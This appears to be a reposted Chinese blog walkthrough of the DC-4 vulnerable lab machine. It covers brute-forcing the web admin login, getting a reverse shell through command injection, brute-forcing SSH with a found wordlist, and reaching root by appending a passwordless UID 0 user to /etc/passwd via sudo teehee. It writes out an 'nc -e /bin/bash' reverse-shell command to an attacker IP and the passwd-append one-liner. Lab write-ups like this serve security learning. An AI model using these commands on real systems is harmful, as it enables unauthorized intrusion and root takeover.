标签:vulhub 爆破 提权 passwd teehee 用户 密码 DC4 靶场
文章目录
环境
- vulhub系列之DC4靶场
- VMware虚拟机
- kali
爆破网站管理员用户拿shell
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-rnbSEStl-1620531650944)(/static/img/DC4/050901.png)]](https://www.icode9.com/i/ll/?i=20210509114225310.png?,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl81MDA1MzgxOA==,size_16,color_FFFFFF,t_70)
由目标靶机的Mac地址可以得出靶机IP为`192.168.43.140`.nmap扫描结果得知目标靶机开放了80端口和22端口,所以只能从目标网站下手。直接进入网首页。
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-qgAtUCh2-1620531650945)(/static/img/DC4/050902.png)]](https://www.icode9.com/i/ll/?i=20210509114237301.png?,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl81MDA1MzgxOA==,size_16,color_FFFFFF,t_70)
根据首页信息可以知道,有admin用户,所以直接用burpsuite爆破,用软件自带密码即可。
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-RjkbscsT-1620531650946)(/static/img/DC4/050903.png)]](https://www.icode9.com/i/ll/?i=2021050911425012.png?,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl81MDA1MzgxOA==,size_16,color_FFFFFF,t_70)
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-2oQBtECD-1620531650947)(/static/img/DC4/050904.png)]](https://www.icode9.com/i/ll/?i=20210509114301441.png?,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl81MDA1MzgxOA==,size_16,color_FFFFFF,t_70)
爆破成功,密码是happy。登陆进去发现是命令执行,所以直接抓包改数据,反弹shell。
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-3DdhGzOm-1620531650948)(/static/img/DC4/050905.png)]](https://www.icode9.com/i/ll/?i=20210509114313327.png?,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl81MDA1MzgxOA==,size_16,color_FFFFFF,t_70)
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-VBo2M0Ze-1620531650950)(/static/img/DC4/050906.png)]](https://www.icode9.com/i/ll/?i=20210509114322384.png)
反弹shell成功,是用nc反弹成功的,bash我没有反弹成功,不知道是哪里出问题了。反弹shell命令为:
nc -e /bin/bash 192.168.43.173 12345
并且在得到的shll用python -c 'import pty;pty.spawn("/bin/bash")'反弹一个完整shll。接下来就是一顿文件查看。看看有没有什么可以利用的信息。
SSH爆破密码
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-W8SnJAZF-1620531650951)(/static/img/DC4/050907.png)]](https://www.icode9.com/i/ll/?i=20210509114339435.png)
最终在/home/jim/backups目录下找到了一份密码文件,所以直接用这份密码文件ssh爆破jim。
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-YOjt7g3c-1620531650952)(/static/img/DC4/050908.png)]](https://www.icode9.com/i/ll/?i=20210509114350199.png?,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl81MDA1MzgxOA==,size_16,color_FFFFFF,t_70)
爆破成功,jim/jibril04直接ssh连接。
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-4z0DZcQV-1620531650953)(/static/img/DC4/050909.png)]](https://www.icode9.com/i/ll/?i=20210509114359683.png?,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl81MDA1MzgxOA==,size_16,color_FFFFFF,t_70)
查看mbox,可以看出这是一个邮箱信息,所以查看邮箱内容(邮箱默认路径为/var/mail)
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-stRaDyVo-1620531650953)(/static/img/DC4/050910.png)]](https://www.icode9.com/i/ll/?i=20210509114410641.png?,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl81MDA1MzgxOA==,size_16,color_FFFFFF,t_70)
邮箱内容是charles发的,并且告诉了密码,所以直接su切换charles。
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-cvl0tfMN-1620531650955)(/static/img/DC4/050911.png)]](https://www.icode9.com/i/ll/?i=20210509114422851.png)
teehee提权
进入charles,查看是否有什么提示信息。没发现可以用的信息。所以看看有不有可以提权的利用点,输入命令sudo -l后发现teehee不需要命令就可以执行root权限。于是查看teehee的帮助信息。
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-oILkG14F-1620531650955)(/static/img/DC4/050913.png)]](https://www.icode9.com/i/ll/?i=20210509114439857.png?,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl81MDA1MzgxOA==,size_16,color_FFFFFF,t_70)
发现teehee的-a参数可以在文件后面加入内容,所以想到可以在/etc/passwd文件加入具有root权限的自定义用户名,并且可以不设置密码。所以根据/etc/passwd文件下的内容格式自定义用户。
/etc/passwd文件下的用户格式为:
用户名:密码占位符:用户id:组id:备注信息:家目录:命令执行环境
当密码占位符为空时,用户没有密码。
执行命令:
echo 'admin::0:0::/home/admin:/bin/bash' |sudo teehee -a /etc/passwd
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-2ldviBjT-1620531650956)(/static/img/DC4/050915.png)]](https://www.icode9.com/i/ll/?i=20210509114457921.png?,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl81MDA1MzgxOA==,size_16,color_FFFFFF,t_70)
直接切换自定义用户,提权成功。
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-16RPQ90D-1620531650956)(/static/img/DC4/050916.png)]](https://www.icode9.com/i/ll/?i=20210509114509700.png?,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl81MDA1MzgxOA==,size_16,color_FFFFFF,t_70)
加入/root下拿到flag.
标签:vulhub,爆破,提权,passwd,teehee,用户,密码,DC4,靶场 来源: https://blog.csdn.net/weixin_50053818/article/details/116562748
本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享; 2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关; 3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关; 4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除; 5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。